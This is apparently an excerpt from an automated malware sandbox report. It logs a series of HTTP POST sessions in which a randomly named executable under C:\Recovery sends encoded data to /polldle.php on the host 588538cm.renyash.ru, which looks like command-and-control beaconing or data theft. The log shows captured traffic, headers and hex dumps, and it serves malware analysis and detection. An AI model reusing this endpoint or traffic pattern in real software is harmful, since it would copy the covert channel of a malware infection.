                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=T9FPQqHLok5WZRU%2BQMVEozY7Asw%2FL2imTXeZFU1rkDIqlKYD8ZBxoo%2BCU0%2F%2FnO5wwLjg01iMvCeAgTn0UNnhjanTbwlpc0cKbxhnN2R44HkDyLenBTMhkDy3LmHmFqZHU%2FW%2BZgsD"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085dc71f39c46d-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=7924&min_rtt=1526&rtt_var=13369&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1935&delivery_rate=27697&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 39 38 0d 0a 0e 11 2e 1c 30 1a 2c 1e 2a 5f 30 03 2e 5e 3b 12 2d 0f 3c 13 29 31 04 5e 20 00 2b 03 26 0b 2b 0b 3c 03 3d 41 3c 03 33 56 23 10 03 0e 32 03 23 46 0c 1d 22 5d 3e 2c 30 51 32 05 24 59 29 33 3e 5a 31 31 24 45 28 34 01 1e 3d 14 2e 04 21 02 29 0b 2a 22 29 56 3e 0b 0c 5b 2e 21 3b 11 32 10 2e 51 0f 16 21 50 35 0f 20 14 23 3d 19 58 32 30 01 13 2b 0a 2b 02 25 14 37 0b 2b 20 25 06 2a 22 2c 57 30 13 34 0e 27 2f 36 5d 3f 39 28 0f 28 11 24 5c 23 0f 28 56 05 3f 5b 4d 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 98.0,*_0.^;-<)1^ +&+<=A<3V#2#F"]>,0Q2$Y)3>Z11$E(4=.!)*")V>[.!;2.Q!P5 #=X20++%7+ %*",W04'/6]?9(($\#(V?[M0
                                                                                Jan 11, 2025 23:33:04.518764973 CET962INHTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:33:04 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=T9FPQqHLok5WZRU%2BQMVEozY7Asw%2FL2imTXeZFU1rkDIqlKYD8ZBxoo%2BCU0%2F%2FnO5wwLjg01iMvCeAgTn0UNnhjanTbwlpc0cKbxhnN2R44HkDyLenBTMhkDy3LmHmFqZHU%2FW%2BZgsD"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085dc71f39c46d-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=7924&min_rtt=1526&rtt_var=13369&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1935&delivery_rate=27697&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 39 38 0d 0a 0e 11 2e 1c 30 1a 2c 1e 2a 5f 30 03 2e 5e 3b 12 2d 0f 3c 13 29 31 04 5e 20 00 2b 03 26 0b 2b 0b 3c 03 3d 41 3c 03 33 56 23 10 03 0e 32 03 23 46 0c 1d 22 5d 3e 2c 30 51 32 05 24 59 29 33 3e 5a 31 31 24 45 28 34 01 1e 3d 14 2e 04 21 02 29 0b 2a 22 29 56 3e 0b 0c 5b 2e 21 3b 11 32 10 2e 51 0f 16 21 50 35 0f 20 14 23 3d 19 58 32 30 01 13 2b 0a 2b 02 25 14 37 0b 2b 20 25 06 2a 22 2c 57 30 13 34 0e 27 2f 36 5d 3f 39 28 0f 28 11 24 5c 23 0f 28 56 05 3f 5b 4d 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 98.0,*_0.^;-<)1^ +&+<=A<3V#2#F"]>,0Q2$Y)3>Z11$E(4=.!)*")V>[.!;2.Q!P5 #=X20++%7+ %*",W04'/6]?9(($\#(V?[M0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                11192.168.2.449768104.21.38.84808604C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Jan 11, 2025 23:33:03.849806070 CET319OUTPOST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:33:04.207915068 CET2504OUTData Raw: 58 51 54 51 5f 42 5a 5a 54 5d 55 5a 50 5e 59 5e 50 5d 5a 5b 57 57 50 56 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: XQTQ_BZZT]UZP^Y^P]Z[WWPV[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#F.&2%T6',-7</+'[)<?S1).+#1'+%#X'/\/,
                                                                                Jan 11, 2025 23:33:04.301589012 CET25INHTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:33:04.518809080 CET25INHTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:33:04.562329054 CET813INHTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:33:04 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FvK7REMcHdYjoIwIKN5eibErPZJe74f72ak%2FH27wm6%2BhscAhon%2FL%2Bu2WZ7aiXJLbxE9Qs8vEUArFs%2FEWoqhlrJlO%2FeNGQSHVcSTjLxddbEUHUWgy4IjdHYDtgpmfiM6NPO8jfFlb"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085dc9a9dc0ca4-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2979&min_rtt=1628&rtt_var=3313&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2823&delivery_rate=117353&cwnd=240&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                12192.168.2.449783104.21.38.84808604C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Jan 11, 2025 23:33:06.538461924 CET295OUTPOST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Jan 11, 2025 23:33:06.895519018 CET2504OUTData Raw: 58 50 51 57 5a 44 5a 58 54 5d 55 5a 50 5e 59 50 50 53 5a 5f 57 5c 50 59 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: XPQWZDZXT]UZP^YPPSZ_W\PY[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#, *B283$!60)V7,_-;#<,?R%#,$620+5#X'/\/,
                                                                                Jan 11, 2025 23:33:07.001715899 CET25INHTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:33:07.237212896 CET809INHTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:33:07 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=o%2B8jE59zALaVQkk8sOeOfjTlfUMZ%2FwkI9tKmqxPikD03NoRYL9dBcpUMFZoVxANwuIWYLH9UcX%2Bd0dUP7xihTQlg5dwJlDRRDiwuiQuMoM2%2BXTno%2BVMizmJ6FXQzaH5TEvzwcCSq"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085dda7bc71a07-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=7976&min_rtt=1865&rtt_var=12922&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2799&delivery_rate=28763&cwnd=244&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                13192.168.2.449790104.21.38.84808604C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Jan 11, 2025 23:33:07.385251045 CET319OUTPOST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2500
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:33:07.739288092 CET2500OUTData Raw: 5d 5a 54 50 5f 43 5a 5c 54 5d 55 5a 50 5c 59 5c 50 54 5a 5e 57 56 50 58 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: ]ZTP_CZ\T]UZP\Y\PTZ^WVPX[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#G9.@&;$1")X%,)4;;(,?R2U:T:B<[623*%#X'/\/4
                                                                                Jan 11, 2025 23:33:07.827342033 CET25INHTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:33:08.056376934 CET798INHTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:33:08 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2EWiFfE147FIztPPuY2PWVrF4B8qx1gqatGr9PJsfxiUXOofvzrYdlO4r6UTcyV6%2FZXyFzfTrJ78gcXGfztXUNZcPul%2BoxnBY78qg34XkPOp9bqTuqEqdHqfPCgJMKqRZiKzSPA4"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085ddfae05ef9d-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2490&min_rtt=2026&rtt_var=1688&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2819&delivery_rate=254399&cwnd=145&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a
                                                                                Data Ascii: 4<YW[
                                                                                Jan 11, 2025 23:33:08.142602921 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                14192.168.2.449796104.21.38.84808604C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Jan 11, 2025 23:33:08.371855974 CET319OUTPOST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:33:08.723547935 CET2504OUTData Raw: 58 5c 54 54 5a 40 5a 5f 54 5d 55 5a 50 55 59 5e 50 56 5a 5a 57 5d 50 5b 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: X\TTZ@Z_T]UZPUY^PVZZW]P[[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU -#6A&+0Y2'6 ?"8(+(1 6,$<53]?#X'/\/
                                                                                Jan 11, 2025 23:33:08.844157934 CET25INHTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:33:09.084268093 CET804INHTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:33:09 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kSxSn3SO6oRaLIZHcXeGBfg6CYbXI2DVCP%2FGPQKH6wD96V%2FWU22wMAY7TVnW7FzR0gMIOX8r9sGJ7U79Uyet9YBmFFcvGdOoWNe3AY7BPB1c0mtn%2BhpwwYqMx8ofxrj8fYD8DGvz"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085de5fb338c47-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4575&min_rtt=1980&rtt_var=5933&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2823&delivery_rate=64195&cwnd=229&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                15192.168.2.449803104.21.38.84808604C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Jan 11, 2025 23:33:09.246273041 CET319OUTPOST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 1608
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:33:09.598551989 CET1608OUTData Raw: 5d 5d 54 50 5a 49 5a 5b 54 5d 55 5a 50 5c 59 5e 50 54 5a 5d 57 55 50 5e 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: ]]TPZIZ[T]UZP\Y^PTZ]WUP^[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU .0:28,Z$1"3V75X;?[+%#1-B 52+5#X'/\/<
                                                                                Jan 11, 2025 23:33:09.705621004 CET25INHTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:33:09.944005966 CET964INHTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:33:09 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bTi%2Fe0%2BR2HSb7Isy5nGx%2Fkj7H8f%2BGIc2Z4JxqujHvoKkglL%2B9E4EndzIB5Aiv0QHckWn1nyPu1yNFyel4uTGIHPbQ%2FlGF7xIURHkDXwMKikVfXu8AFQafO%2FDBwN2GM%2FxvWkpMGvu"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085deb6fca7d11-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=7909&min_rtt=1989&rtt_var=12586&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1927&delivery_rate=29585&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 39 38 0d 0a 0e 11 2d 0b 24 42 3c 58 28 3a 2b 1d 2e 5e 2c 02 2d 08 23 01 29 22 36 5c 20 17 20 11 31 32 3b 0a 3f 14 0b 43 3f 2a 06 0e 20 10 3e 55 26 29 23 46 0c 1d 21 01 3e 3f 24 56 26 3c 0a 12 3c 23 3e 11 26 0b 23 1b 3d 1d 2c 0c 2a 3a 32 05 23 2c 26 53 2a 31 2a 0a 3d 1b 32 16 38 1f 38 00 26 2a 2e 51 0f 16 21 13 35 1f 28 1b 37 03 1e 06 24 20 23 13 29 24 2f 01 25 29 34 51 3f 20 3d 01 3f 32 0e 51 33 2d 27 54 31 59 26 17 28 07 2f 51 3f 11 24 5c 23 0f 28 56 05 3f 5b 4d 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 98-$B<X(:+.^,-#)"6\ 12;?C?* >U&)#F!>?$V&<<#>&#=,*:2#,&S*1*=288&*.Q!5(7$ #)$/%)4Q? =?2Q3-'T1Y&(/Q?$\#(V?[M0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                16192.168.2.449804104.21.38.84808604C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Jan 11, 2025 23:33:09.263638973 CET319OUTPOST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:33:09.614195108 CET2504OUTData Raw: 5d 5c 54 50 5a 47 5f 5c 54 5d 55 5a 50 5b 59 5c 50 55 5a 5b 57 56 50 59 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: ]\TPZG_\T]UZP[Y\PUZ[WVPY[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#-051/&T50,1R Z5/+()/7$39$<!!/\+#X'/\/
                                                                                Jan 11, 2025 23:33:09.734811068 CET25INHTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:33:09.908478022 CET806INHTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:33:09 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SYmTh8gpnFjTaLxetkLg16MWM1lBQjLuUuEQeIusKMzyiq56xq%2F0Hy9NxLkZd6IQ2AioVWs1CDQ8Phuf84l%2FcTwml5P62ORtBdpzI4%2BN1P3xvoOFVqGMhLsro%2BCJruREkW36vl1I"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085deb8bc9c40c-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4086&min_rtt=1486&rtt_var=5757&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2823&delivery_rate=65511&cwnd=220&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                17192.168.2.449809104.21.38.84808604C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Jan 11, 2025 23:33:10.095331907 CET295OUTPOST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Jan 11, 2025 23:33:10.442336082 CET2504OUTData Raw: 5d 5e 54 5e 5f 41 5a 5a 54 5d 55 5a 50 5b 59 5a 50 55 5a 52 57 5c 50 59 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: ]^T^_AZZT]UZP[YZPUZRW\PY[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#@.&@18223U4Z&;88(/<10-9$$52/X+#X'/\/
                                                                                Jan 11, 2025 23:33:10.541765928 CET25INHTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:33:10.754272938 CET25INHTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:33:10.795636892 CET799INHTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:33:10 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=krQ5IchT1h2d0t67oJSsNKMTWudDjuIdeqHdUmFoMPVMgdln678b9n2ldAS20YjOqWJE9V1zCnL3sADZWwmVVgXvTKrYejdUT7vph7LNTWT8FLCSrHGaGMOGri5mDuYeRBq6zQ7V"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085df098529e1a-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3152&min_rtt=1939&rtt_var=3154&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2799&delivery_rate=125354&cwnd=214&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                18192.168.2.449816104.21.38.84808604C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Jan 11, 2025 23:33:11.092509985 CET319OUTPOST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:33:11.442289114 CET2504OUTData Raw: 58 51 54 5f 5f 43 5a 5f 54 5d 55 5a 50 59 59 5f 50 57 5a 5a 57 52 50 57 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: XQT__CZ_T]UZPYY_PWZZWRPW[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#B,0*&^,Z1*'?",=Y8)/R2.$$]!2 ?5#X'/\/0
                                                                                Jan 11, 2025 23:33:11.560729027 CET25INHTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:33:11.812782049 CET807INHTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:33:11 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=P%2F7lTxzOyhr1PZvxEqqaH6CZgGV6wI0o9Jvg702kakopkIraYK%2B6kUPMP0vZpp4SUZjTHeihFquu5HbRZetlCCQ6ByeEFjggZj%2FnmhDFFXBibbmFXDFgvc3G5v66OaZnhMTQ%2FANP"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085df6fce85e7e-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=8308&min_rtt=1757&rtt_var=13761&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2823&delivery_rate=26953&cwnd=232&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
